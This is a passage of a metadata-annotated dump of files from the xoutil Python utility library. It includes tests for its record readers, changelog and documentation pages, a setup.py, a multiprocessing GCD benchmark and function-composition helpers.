To be compatible with\n Python 3.x in an easy way, use this list.\n\n \"\"\"\n\n def __init__(self, *args):\n if len(args) == 1:\n from types import GeneratorType as gtype\n\n if isinstance(args[0], (tuple, list, set, frozenset, gtype)):\n args = args[0]\n super().__init__(str(arg) for arg in args)\n\n def __add__(self, other):\n other = [str(item) for item in other]\n return super().__add__(other)\n\n __iadd__ = __add__\n\n def __contains__(self, item):\n return super().__contains__(str(item))\n\n def append(self, value):\n \"\"\"l.append(value) -- append a name object to end\"\"\"\n super().append(str(value))\n return value # What allow to use its instances as a decorator\n\n __call__ = append\n\n def extend(self, items):\n \"\"\"l.extend(items) -- extend list by appending items from the iterable\n \"\"\"\n items = (str(item) for item in items)\n return super().extend(items)\n\n def index(self, value, *args):\n \"\"\"l.index(value, [start, [stop]]) -> int -- return first index of name\n\n Raises ValueError if the name is not present.\n\n \"\"\"\n return super().index(str(value), *args)\n\n def insert(self, index, value):\n \"\"\"l.insert(index, value) -- insert object before index\n \"\"\"\n return super().insert(index, str(value))\n\n def remove(self, value):\n \"\"\"l.remove(value) -- remove first occurrence of value\n\n Raises ValueError if the value is not present.\n\n \"\"\"\n return list.remove(self, str(value))\n\n\n# Theses tests need to be defined in this module to test relative imports.\n# Otherwise the `tests/` directory would need to be a proper package.\n\nimport unittest as _utest\nfrom xotl.tools.symbols import Unset as _Unset # Use a tier 0 module!\n\n\nclass TestRelativeImports(_utest.TestCase):\n RelativeUnset = _Unset\n AbsoluteUndefined = _undef\n\n def test_relative_imports(self):\n self.assertEquals(nameof(self.RelativeUnset), \"_Unset\")\n self.assertEquals(nameof(self.RelativeUnset, inner=True), \"Unset\")\n\n # Even relative imports are 
resolved properly with `full=True`\n self.assertEquals(\n nameof(self.RelativeUnset, full=True), \"xotl.tools.names._Unset\"\n )\n\n self.assertEquals(\n nameof(self.AbsoluteUndefined, full=True), \"xotl.tools.names._undef\"\n )\n\n\n# Don't delete the _Unset name, so that the nameof inside the test could find\n# them in the module.\ndel _utest\n" }, { "alpha_fraction": 0.7148846983909607, "alphanum_fraction": 0.7274633049964905, "avg_line_length": 42.3636360168457, "blob_id": "4268e20f0aa58ceb25886664380639d5d5085fd0", "content_id": "545c09fdad473c5f5a2a67e61b0b6da5ffa4631a", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 477, "license_type": "permissive", "max_line_length": 77, "num_lines": 11, "path": "/docs/source/history/_changes-1.5.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Now `xoutil` supports Python 2.7, and 3.1+. Python 3.0 was not tested.\n\n- Added a `strict` parameter to `xoutil.objects.smart_getter`:func:.\n\n- New function `xoutil.objects.get_traverser`:func:.\n\n- The function `xoutil.cli.app.main`:func: prefers its `default` parameter\n instead of the application's default command.\n\n Allow the `xoutil.cli.Command`:class: to define a ``command_cli_name`` to\n change the name of the command. 
See `xoutil.cli.tools.command_name`:func:.\n" }, { "alpha_fraction": 0.5646013021469116, "alphanum_fraction": 0.5894628167152405, "avg_line_length": 29.562992095947266, "blob_id": "eaa7c56ce74d032261cbd5162178f01c2dd70044", "content_id": "b59be3d02c08042ff61ea4c287feb2109292998f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7764, "license_type": "no_license", "max_line_length": 78, "num_lines": 254, "path": "/tests/test_records.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport unittest\nfrom mock import patch\nfrom datetime import datetime, date\n\nfrom xoutil.records import record, datetime_reader, date_reader\n\nfrom hypothesis import given\nfrom hypothesis.strategies import composite, text, integers, datetimes\n\n\nFMT = \"%Y-%m-%d\"\n\n\nclass _table(record):\n ID = 0\n _id_reader = lambda val: int(val)\n\n\nclass person(_table):\n NAME = 1\n LASTNAME = 2\n BIRTHDATE = 3\n\n _birthdate_reader = datetime_reader(\"%Y-%m-%d\")\n\n @property\n def current_age(self):\n from datetime import datetime\n\n today = datetime.today()\n return self.age_when(today)\n\n def age_when(self, today):\n res = today - self.birthdate\n return int(res.days // 365.25)\n\n\nMIN_DATE = datetime(1920, 1, 1)\nMAX_DATE = datetime(2007, 12, 31)\n\n\n@composite\ndef persons(draw):\n id = draw(integers())\n name = draw(text())\n lastname = draw(text())\n birthday = draw(datetimes(MIN_DATE, MAX_DATE)).strftime(FMT)\n return (\n (id, name, lastname, birthday),\n person((id, name, lastname, birthday)),\n )\n\n\nclass TestRecords(unittest.TestCase):\n def test_records(self):\n from datetime import datetime\n\n _manu 
= (\"1\", \"Manuel\", \"Vazquez\", \"1978-10-21\")\n manu = person(_manu)\n\n self.assertEqual(1, person.get_field(_manu, person.ID))\n self.assertEqual(1, manu.id)\n self.assertEqual(11, manu.age_when(datetime(1989, 10, 21)))\n self.assertEqual(35, manu.age_when(datetime(2014, 9, 22)))\n\n @given(p=persons())\n def test_record(self, p):\n r, p = p\n self.assertEqual(r[0], person.get_field(r, person.ID))\n self.assertEqual(r[0], p.id)\n self.assertEqual(r[1], p.name)\n self.assertEqual(r[2], p.lastname)\n self.assertEqual(r[3], p.birthdate.strftime(FMT))\n\n def test_descriptor(self):\n class INVOICE(record):\n ID = 0\n REFERER = 1\n\n # The following attribute will be overwritten by the fields\n # descriptor for REFERER.\n referer = \"overwritten\"\n\n assert INVOICE.referer and INVOICE.id\n line = (1, \"MVA.98\")\n self.assertEqual(INVOICE.get_field(line, INVOICE.ID), 1)\n invoice = INVOICE(line)\n self.assertEqual(invoice.referer, \"MVA.98\")\n self.assertEqual(invoice[INVOICE.REFERER], invoice.referer)\n\n def test_readers(self):\n from datetime import datetime, timedelta\n\n class INVOICE(record):\n ID = 0\n REFERER = 1\n CREATED_DATETIME = 2\n UPDATE_DATETIME = 3\n _DATETIME_FORMAT = \"%Y-%m-%d %H:%M:%S.%f\"\n\n @staticmethod\n def _created_datetime_reader(value):\n return datetime.strptime(value, INVOICE._DATETIME_FORMAT)\n\n # implicit staticmethod\n def _update_datetime_reader(value):\n return datetime.strptime(value, INVOICE._DATETIME_FORMAT)\n\n today = datetime.now()\n yesterday = today - timedelta(days=1)\n tomorrow = today + timedelta(days=1)\n line = (\n 1,\n \"MVA.98\",\n yesterday.strftime(INVOICE._DATETIME_FORMAT),\n tomorrow.strftime(INVOICE._DATETIME_FORMAT),\n )\n self.assertEqual(\n INVOICE.get_field(line, INVOICE.CREATED_DATETIME), yesterday\n )\n self.assertEqual(\n INVOICE.get_field(line, INVOICE.UPDATE_DATETIME), tomorrow\n )\n\n invoice = INVOICE(line)\n self.assertEqual(invoice.created_datetime, yesterday)\n 
self.assertEqual(invoice.update_datetime, tomorrow)\n\n def test_default_values(self):\n from xoutil.records import float_reader\n\n class LINE(record):\n DEBIT = \"Debit\"\n CREDIT = \"Credit\"\n _debit_reader = float_reader(nullable=True, default=0)\n _credit_reader = float_reader(nullable=True)\n\n nodata = {}\n partialdata = {\"Credit\": 0}\n nulls = {\"Debit\": \"\"}\n self.assertEqual(LINE.get_field(nodata, LINE.DEBIT), 0)\n self.assertIsNone(LINE.get_field(nodata, LINE.CREDIT))\n self.assertEqual(LINE.get_field(partialdata, LINE.DEBIT), 0)\n self.assertEqual(LINE.get_field(partialdata, LINE.CREDIT), 0)\n self.assertEqual(LINE.get_field(nulls, LINE.DEBIT), 0)\n\n\nclass TestDateTimeReader(unittest.TestCase):\n def setUp(self):\n # clear lru caches for each test... Needed so that imports done inside\n # datetime_reader are mockable.\n datetime_reader.cache_clear()\n\n def test_strict(self):\n class rec(record):\n MOMENT = 0\n _moment_reader = datetime_reader(FMT)\n\n inst = rec([\"2014-12-17\"])\n self.assertEqual(\"2014-12-17\", inst.moment.strftime(FMT))\n\n inst = rec([\"201-12-17\"])\n with self.assertRaises(ValueError):\n self.assertEqual(\"201-12-17\", inst.moment.strftime(FMT))\n\n def test_relaxed_but_nonnullable_with_dateutil(self):\n class rec(record):\n MOMENT = 0\n _moment_reader = datetime_reader(\n FMT, nullable=False, strict=False\n )\n\n inst = rec([\"201-12-17\"])\n self.assertEqual(inst.moment, datetime(201, 12, 17))\n\n @patch(\"dateutil.parser.parse\", None)\n def test_relaxed_but_nonnullable_without_dateutil(self):\n class rec(record):\n MOMENT = 0\n _moment_reader = datetime_reader(\n FMT, nullable=False, strict=False\n )\n\n inst = rec([\"201-12-17\"])\n with self.assertRaises(ValueError):\n self.assertIsNone(inst.moment)\n\n @patch(\"dateutil.parser.parse\", None)\n def test_relax_with_default(self):\n class rec(record):\n MOMENT = 0\n _moment_reader = datetime_reader(FMT, default=0, strict=False)\n\n inst = rec([\"201-12-17\"])\n 
self.assertEqual(inst.moment, 0)\n\n\nclass TestDateReader(unittest.TestCase):\n def setUp(self):\n # clear lru caches for each test... Needed so that imports done inside\n # date_reader are mockable.\n date_reader.cache_clear()\n datetime_reader.cache_clear()\n\n def test_date_reader_nullable(self):\n class rec(record):\n WHEN = \"date\"\n _when_reader = date_reader(FMT, nullable=True)\n\n inst = rec({\"date\": \"2015-01-01\"})\n self.assertEqual(inst.when, date(2015, 1, 1))\n\n inst = rec({})\n self.assertIsNone(inst.when)\n\n inst = rec({\"date\": \"201-01-01\"})\n with self.assertRaises(ValueError):\n inst.when\n\n def test_date_reader_relaxed_with_dateutil(self):\n class rec(record):\n WHEN = \"date\"\n _when_reader = date_reader(FMT, strict=False)\n\n inst = rec({\"date\": \"201-01-01\"})\n self.assertEqual(inst.when, date(201, 1, 1))\n\n @patch(\"dateutil.parser.parse\", None)\n def test_date_reader_relaxed_nullable_no_dateutil(self):\n class rec(record):\n WHEN = \"date\"\n _when_reader = date_reader(FMT, nullable=True, strict=False)\n\n inst = rec({\"date\": \"201-01-01\"})\n self.assertIsNone(inst.when)\n\n @patch(\"dateutil.parser.parse\", None)\n def test_date_reader_relaxed_no_dateutil(self):\n class rec(record):\n WHEN = \"date\"\n _when_reader = date_reader(FMT, strict=False)\n\n inst = rec({\"date\": \"201-01-01\"})\n with self.assertRaises(ValueError):\n self.assertIsNone(inst.when)\n" }, { "alpha_fraction": 0.5050301551818848, "alphanum_fraction": 0.5070422291755676, "avg_line_length": 30.0625, "blob_id": "43d2b69b6bcc8be448366d769ed83c552c996a93", "content_id": "c4db56e22472e99483122545b6c638241562c568", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 497, "license_type": "permissive", "max_line_length": 77, "num_lines": 16, "path": "/docs/source/xotl.tools/dim/meta.rst", "repo_name": "merchise-autrement/xoutil", 
"src_encoding": "UTF-8", "text": "======================================================================\n `xotl.tools.dim.meta`:mod: -- Meta-definitions for concrete numbers.\n======================================================================\n\n.. automodule:: xotl.tools.dim.meta\n :members: Dimension, Signature, Quantity, Scalar\n\n.. data:: UNIT\n\n This the constant value ``1``. It's given this name to emphasize it's the\n canonical unit for a dimension.\n\n\n.. data:: SCALAR\n\n The signature of dimensionless quantities.\n" }, { "alpha_fraction": 0.49065420031547546, "alphanum_fraction": 0.49065420031547546, "avg_line_length": 52.5, "blob_id": "34a152208c0b83d68b280e5ee12d1248ba8b27e0", "content_id": "3a78a8e08ccd5333932563184e20465f4df9ea08", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 428, "license_type": "permissive", "max_line_length": 77, "num_lines": 8, "path": "/docs/source/xotl.tools/future/contextlib.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=============================================================================\n `xotl.tools.future.contextlib`:mod: - Utilities for with-statement contexts\n=============================================================================\n\n.. 
automodule:: xotl.tools.future.contextlib\n\nThe main reason to use this module is to stop using the ``nested()`` function\nand use the `ExitStack <contextlib.ExitStack>`:class: implementation.\n" }, { "alpha_fraction": 0.7547169923782349, "alphanum_fraction": 0.7547169923782349, "avg_line_length": 52, "blob_id": "90abef439ab95f2446c2f4c64546e183158a8142", "content_id": "6cf21be6469b7d32e199e0f23eee35bbe3a439aa", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 53, "license_type": "permissive", "max_line_length": 52, "num_lines": 1, "path": "/docs/source/history/_changes-2.1.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Make `xotl.tools.infinity.Infinity`:obj: pickable.\n" }, { "alpha_fraction": 0.606072723865509, "alphanum_fraction": 0.6152616739273071, "avg_line_length": 26.505495071411133, "blob_id": "2d5a19c51f2ce66df1198aa6c1c7b7ef87d56cd7", "content_id": "cd4b72838b6a0412484390b6924f51776e8a3bfe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2503, "license_type": "no_license", "max_line_length": 76, "num_lines": 91, "path": "/setup.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n# flake8: noqa\nimport os\nimport sys\nimport versioneer\n\nfrom setuptools import setup, find_packages\n\ntry:\n execfile\nexcept NameError:\n\n def execfile(filename):\n \"To run in Python 3\"\n import builtins\n\n exec_ = getattr(builtins, \"exec\")\n with open(filename, \"rb\") as f:\n code = compile(f.read().decode(\"utf-8\"), filename, \"exec\")\n return exec_(code, globals())\n\n\n# Import the version from the release module\nproject_name = \"xotl.tools\"\n_current_dir = os.path.dirname(os.path.abspath(__file__))\ndev_classifier = \"Development Status :: 5 - 
Production/Stable\"\n\nfrom setuptools.command.test import test as TestCommand\n\n\nclass PyTest(TestCommand):\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n import pytest\n\n errno = pytest.main(self.test_args)\n sys.exit(errno)\n\n\n_cmdclass = {\"test\": PyTest}\n_cmdclass.update(versioneer.get_cmdclass())\n\n\nsetup(\n name=project_name,\n version=versioneer.get_version(),\n description=(\n \"Collection of usefull algorithms and other very \" \"disparate stuff\"\n ),\n long_description=open(os.path.join(_current_dir, \"README.rst\")).read(),\n classifiers=[\n # Get from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n dev_classifier,\n \"Intended Audience :: Developers\",\n (\n \"License :: OSI Approved :: \"\n \"GNU General Public License v3 or later (GPLv3+)\"\n ),\n \"Operating System :: POSIX :: Linux\", # This is where we are\n # testing. Don't promise\n # anything else.\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n keywords=\"\",\n author=\"Merchise Autrement\",\n author_email=\"[email protected]\",\n url=\"https://github.com/merchise/xoutil/\",\n license=\"GPLv3+\",\n tests_require=[\"pytest\"],\n namespace_packages=[\"xotl\"],\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n python_requires=\">=3.4\",\n install_requires=[\n 'monotonic; python_version<\"3.3\"',\n 'contextlib2; python_version<\"3.4\"',\n 'typing; python_version<\"3.5\"',\n ],\n extras_require={\n \"recommended\": [\"python-dateutil\", 'enum34; python_version<\"3.4\"']\n },\n cmdclass=_cmdclass,\n)\n" }, { "alpha_fraction": 0.7438016533851624, "alphanum_fraction": 0.7438016533851624, "avg_line_length": 47.400001525878906, "blob_id": "1d21c1b86e6922ba6ab972f07f72b71ed58b177c", "content_id": "c7f05b8ba21b34563cd945dfedc283c8c80d0260", "detected_licenses": 
[ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 242, "license_type": "permissive", "max_line_length": 75, "num_lines": 5, "path": "/docs/source/history/_changes-1.5.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added functions `xoutil.objects.dict_merge`:func:,\n `xoutil.types.are_instances`:func: and `xoutil.types.no_instances`:func:.\n\n- Deprecated function `xoutil.objects.smart_getattr`:func:. Use\n `xoutil.objects.get_first_of`:func: instead.\n" }, { "alpha_fraction": 0.5394548177719116, "alphanum_fraction": 0.5571497082710266, "avg_line_length": 23.89285659790039, "blob_id": "cf5b8dfb57abbc7b8c2d047f08ce397f1bbe2e04", "content_id": "cc7f039adf3fddb8d92fb639a12a9a96abc57d3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2092, "license_type": "no_license", "max_line_length": 87, "num_lines": 84, "path": "/xotl/tools/benchmark/mp.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright (c) 2013-2017 Merchise Autrement [~º/~] and Contributors\n# Copyright (c) 2012 Manuel Vazquez\n\nfrom multiprocessing import Pool, cpu_count\nfrom itertools import count, islice, repeat\n\ntry:\n from itertools import izip as zip\nexcept ImportError:\n pass\n\n\ndef gcd(a, b):\n while a % b != 0:\n a, b = b, a % b\n return b\n\n\ndef job(args):\n which, show = args\n try:\n result = gcd(which, which + 2 ** 37 - 73)\n if show and result != 1:\n print(which, result)\n except KeyboardInterrupt:\n pass\n\n\nif __name__ == \"__main__\":\n from datetime import datetime\n import argparse\n\n cpus = max(cpu_count() - 1, 1)\n parser = argparse.ArgumentParser(\n \"Run several workers calculating GCD \"\n \"for large numbers. 
Uses multiprocessing \"\n \"to test several CPUs.\"\n )\n parser.add_argument(\n \"--show\",\n help=\"Whether to print or not the gcds\",\n action=\"store_true\",\n dest=\"show\",\n default=False,\n )\n parser.add_argument(\n \"--workers\",\n help=\"Number of workers. Defaults to %d.\" % cpus,\n type=int,\n action=\"store\",\n dest=\"workers\",\n default=cpus,\n )\n parser.add_argument(\n \"--size\",\n help=\"The magnitude of the test. Represents how many \"\n \"cycles are processed, exactly 10**MAGNITUDE; \"\n \"so be nice!\",\n type=int,\n action=\"store\",\n dest=\"magnitude\",\n default=6,\n )\n args = parser.parse_args()\n\n pool = Pool(processes=args.workers)\n start = datetime.now()\n try:\n print(\"Working...\")\n pool.imap(\n job,\n zip(islice(count(2 ** 1028 + 1), 10 ** args.magnitude), repeat(args.show)),\n chunksize=1024,\n )\n pool.close()\n pool.join()\n except KeyboardInterrupt:\n pool.terminate()\n pool.join()\n end = datetime.now()\n total_seconds = (end - start).total_seconds()\n print(\"All workers (%d) finished in %f seconds\" % (args.workers, total_seconds))\n" }, { "alpha_fraction": 0.6799409985542297, "alphanum_fraction": 0.6799409985542297, "avg_line_length": 36.66666793823242, "blob_id": "128df49dce2abe3666ebfed695d04ad2873e2934", "content_id": "67d9f867fcf8c4adffef8b32093f1444d31f6b1d", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 678, "license_type": "permissive", "max_line_length": 78, "num_lines": 18, "path": "/docs/source/history/_changes-1.8.4.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add module `xoutil.future.csv`:mod:.\n\n- Add module `xoutil.future.mimetypes`:mod:.\n\n- Add module `xoutil.eight.urllib`:mod:.\n\n- The module ``xoutil.iterators`` is now officially named\n `xoutil.future.itertools`:mod:. 
The alias ``xoutil.iterators`` remains as a\n deprecated alias.\n\n- Add `xoutil.future.itertools.merge`:func:.\n\n- Add `xoutil.future.types._get_mro_attr`:func: function.\n\n- Deprecate in `xoutil.future.types`:mod: module: ``mro_dict`` class; and the\n functions ``mro_get_value_list``, ``mro_get_full_mapping``, ``is_iterable``,\n ``is_collection``, ``is_mapping``, ``is_string_like``, ``is_scalar``,\n ``is_module``, ``are_instances``, and ``no_instances``.\n" }, { "alpha_fraction": 0.7428571581840515, "alphanum_fraction": 0.7428571581840515, "avg_line_length": 51.5, "blob_id": "9db02fc5e45a246e2437642c66f6a14c07df4269", "content_id": "4bb89802828133f7b6196ae504a6dcd76a5ea192", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 105, "license_type": "permissive", "max_line_length": 76, "num_lines": 2, "path": "/docs/source/history/_changes-2.1.6.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Deprecate `xotl.tools.future.itertools.first_n`:func: in favor of stdlib's\n `itertools.islice`:func:.\n" }, { "alpha_fraction": 0.5368036031723022, "alphanum_fraction": 0.5402602553367615, "avg_line_length": 28.2738094329834, "blob_id": "74fb257c64974a3a85672960a784842a59ea6d5a", "content_id": "0a27a42aec3794aa248458d0a8118728d7e6cd78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9838, "license_type": "no_license", "max_line_length": 78, "num_lines": 336, "path": "/xotl/tools/fp/tools.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you 
to.\n#\n\n\"\"\"Tools for working with functions in a more \"pure\" way.\n\n\"\"\"\n\nfrom abc import ABCMeta\n\n\ndef identity(arg):\n \"\"\"Returns its argument unaltered.\"\"\"\n return arg\n\n\ndef constant(value):\n \"Return a function that always return a constant `value`.\"\n\n def result(*args, **kwargs):\n return value\n\n return result\n\n\ndef fst(pair, strict=True):\n \"\"\"Return the first element of `pair`.\n\n If `strict` is True, `pair` needs to unpack to exactly two values. If\n `strict` is False this is the same as ``pair[0]``.\n\n .. note:: This is an idiomatic function intended for using in compositions\n or as the argument or high-level functions. Don't use it in your code\n as a replacement of ``x[0]``.\n\n .. versionadded:: 1.8.5\n\n \"\"\"\n if strict:\n res, _ = pair\n return res\n else:\n return pair[0]\n\n\ndef snd(pair, strict=True):\n \"\"\"Return the second element of `pair`.\n\n If `strict` is True, `pair` needs to unpack to exactly two values. If\n `strict` is False this is the same as ``pair[1]``.\n\n .. note:: This is an idiomatic function intended for using in compositions\n or as the argument or high-level functions. Don't use it in your code\n as a replacement of ``x[1]``.\n\n .. 
versionadded:: 1.8.5\n\n \"\"\"\n if strict:\n _, res = pair\n return res\n else:\n return pair[1]\n\n\nclass MetaCompose(ABCMeta):\n\n \"\"\"Meta-class for function composition.\"\"\"\n\n def __instancecheck__(self, instance):\n \"\"\"Override for ``isinstance(instance, self)``.\"\"\"\n res = super().__instancecheck__(instance)\n if not res:\n # TODO: maybe only those with parameters.\n res = callable(instance)\n return res\n\n def __subclasscheck__(self, subclass):\n \"\"\"Override for ``issubclass(subclass, self)``.\"\"\"\n res = super().__subclasscheck__(subclass)\n if not res:\n from xotl.tools.future.types import FuncTypes\n\n res = subclass in FuncTypes\n return res\n\n\nclass compose(metaclass=MetaCompose):\n r\"\"\"Composition of several functions.\n\n Functions are composed right to left. A composition of zero functions\n gives back the `identity`:func: function.\n\n The following rules (the arguments of `all`) are always true::\n\n >>> x = 15\n >>> f, g, h = x.__add__, x.__mul__, x.__xor__\n >>> all((compose() is identity,\n ...\n ... # identity functions are optimized\n ... compose(identity, f, identity) is f,\n ...\n ... compose(f) is f,\n ... compose(g, f)(x) == g(f(x)),\n ... 
compose(h, g, f)(x) == h(g(f(x)))))\n True\n\n If any \"intermediate\" function returns an instance of:\n\n - `pos_args`:class:\\ : it's expanded as variable positional arguments to\n the next function.\n\n - `kw_args`:class:\\ : it's expanded as variable keyword arguments to the\n next function.\n\n - `full_args`:class:\\ : it's expanded as variable positional and keyword\n arguments to the next function.\n\n The expected usage of these is **not** to have function return those types\n directly, but to use them when composing functions that return tuples and\n expect tuples.\n\n \"\"\"\n # TODO: __slots__ = ('inner', 'scope')\n\n def __new__(cls, *functions):\n functions = [fn for fn in functions if fn is not identity]\n count = len(functions)\n if count == 0:\n return identity\n else:\n if all(callable(f) for f in functions):\n if count == 1:\n return functions[0]\n else:\n from xotl.tools.symbols import Unset\n\n self = super().__new__(cls)\n self.inner = functions\n self.scope = Unset\n return self\n else:\n raise TypeError(\"at least one argument is not callable\")\n\n def __call__(self, *args, **kwds):\n funcs = self.inner\n count = len(funcs)\n if count:\n i = 1\n res = full_args((args, kwds))\n while i <= count:\n try:\n fn = funcs[-i]\n if isinstance(res, pos_args):\n res = fn(*res)\n elif isinstance(res, kw_args):\n res = fn(**res)\n elif isinstance(res, full_args):\n res = fn(*res[0], **res[1])\n else:\n res = fn(res)\n except Exception:\n # TODO: @med What's the point of of resetting scope under\n # exception? Should this `try..` even be?\n self.scope = (count - i, fn)\n raise\n i += 1\n return res\n else:\n return identity(*args, **kwds)\n\n def __repr__(self):\n \"\"\"Get composed function representation\"\"\"\n from xotl.tools.tools import nameof\n\n if self.inner:\n\n def getname(fn):\n return nameof(fn).replace((lambda: None).__name__, \"λ\")\n\n return \" . 
\".join(getname(fn) for fn in self.inner)\n else:\n return nameof(identity)\n\n def __str__(self):\n \"\"\"Get composed function string\"\"\"\n count = len(self.inner)\n if count == 0:\n return identity.__doc__\n else:\n res = self.inner[0].__doc__ if count == 1 else None\n if not res:\n res = \"Composed function: <{!r}>\".format(self)\n return res\n\n def _get_name(self):\n res = self.__dict__.get(\"__name__\")\n if res is None:\n res = repr(self)\n return res\n\n def _set_name(self, value):\n self.__dict__[\"__name__\"] = value\n\n __name__ = property(_get_name, _set_name)\n\n def _get_doc(self):\n res = self.__dict__.get(\"__doc__\")\n if res is None:\n res = str(self)\n return res\n\n def _set_doc(self, value):\n self.__dict__[\"__doc__\"] = value\n\n __doc__ = property(_get_doc, _set_doc)\n\n def __eq__(self, other):\n if isinstance(type(other), MetaCompose):\n return self.inner == other.inner\n elif self.inner:\n return self.inner[0] == other\n else:\n return other is identity\n\n def __len__(self):\n return len(self.inner)\n\n def __iter__(self):\n return iter(self.inner)\n\n def __contains__(self, item):\n return item in self.inner\n\n def __getitem__(self, index):\n res = self.inner[index]\n return compose(*res) if isinstance(res, list) else res\n\n # TODO: Should we really allow compose be mutable?\n def __setitem__(self, index, value):\n if isinstance(index, slice) and isinstance(type(value), MetaCompose):\n value = value.inner\n self.inner[index] = value\n\n def __delitem__(self, index):\n del self.inner[index]\n\n\nclass pos_args(tuple):\n \"\"\"Mark variable number positional arguments (see `full_args`:class:).\"\"\"\n\n\nclass kw_args(dict):\n \"\"\"Mark variable number keyword arguments (see `full_args`:class:).\"\"\"\n\n\nclass full_args(tuple):\n \"\"\"Mark variable number arguments for composition.\n\n Pair containing positional and keyword ``(args, kwds)`` arguments.\n\n In standard functional composition, the result of a function is 
considered\n a single value to be use as the next function argument. You can override\n this behaviour returning one instance of `pos_args`:class:,\n `kw_args`:class:, or this class; in order to provide multiple arguments to\n the next call.\n\n Since types are callable, you may use it directly in `compose`:func:\n instead of changing your functions to returns the instance of one of these\n classes::\n\n >>> def join_args(*args):\n ... return ' -- '.join(str(arg) for arg in args)\n\n >>> compose(join_args, pos_args, list, range)(2)\n '0 -- 1'\n\n # Without 'pos_args', it prints the list\n >>> compose(join_args, list, range)(2)\n '[0, 1]'\n\n \"\"\"\n\n @staticmethod\n def parse(arg):\n \"\"\"Parse possible alternatives.\n\n If ``arg`` is:\n\n - a pair of a ``tuple`` and a ``dict``, return a `full_args`:class:\n instance.\n\n - a ``tuple`` or a ``list``, return a `pos_args`:class: instance;\n\n - a ``dict``, return a `kw_args`:class: instance;\n\n - ``None``, return an empty `pos_args`:class: instance.\n\n For example (remember that functions return 'None' when no explicit\n 'return' is issued)::\n\n >>> def join_args(*args):\n ... if args:\n ... 
return ' -- '.join(str(arg) for arg in args)\n\n >>> compose(join_args, full_args.parse, join_args)()\n None\n\n # Without 'full_args.parse', return 'str(None)'\n >>> compose(join_args, join_args)()\n 'None'\n\n \"\"\"\n if isinstance(arg, tuple):\n\n def check(pos, kw):\n return isinstance(pos, tuple) and isinstance(kw, dict)\n\n if len(arg) == 2 and check(*arg):\n return full_args(arg)\n else:\n return pos_args(arg)\n elif isinstance(arg, list):\n return pos_args(arg)\n elif isinstance(arg, dict):\n return kw_args(arg)\n elif arg is None:\n return pos_args()\n else:\n msg = \"Expecting None, a tuple, a list, or a dict; {} found\"\n raise TypeError(msg.format(type(arg).__name__))\n" }, { "alpha_fraction": 0.6517857313156128, "alphanum_fraction": 0.6517857313156128, "avg_line_length": 31, "blob_id": "4f1d4e09c1f5f188b0d74189be34ba9885c52ed3", "content_id": "6e0657b8ac57cbe189fc1a21db907a9b329312ae", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 448, "license_type": "permissive", "max_line_length": 121, "num_lines": 14, "path": "/docs/source/xotl.tools/deprecation.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.deprecation`:mod: - Utils for marking deprecated elements\n=====================================================================\n\n.. automodule:: xotl.tools.deprecation\n\n.. autofunction:: deprecated(replacement, msg=None, deprecated_module=None, removed_in_version=None, check_version=False)\n\n.. autofunction:: deprecated_alias\n\n.. autofunction:: import_deprecated\n\n.. autofunction:: deprecate_module\n\n.. 
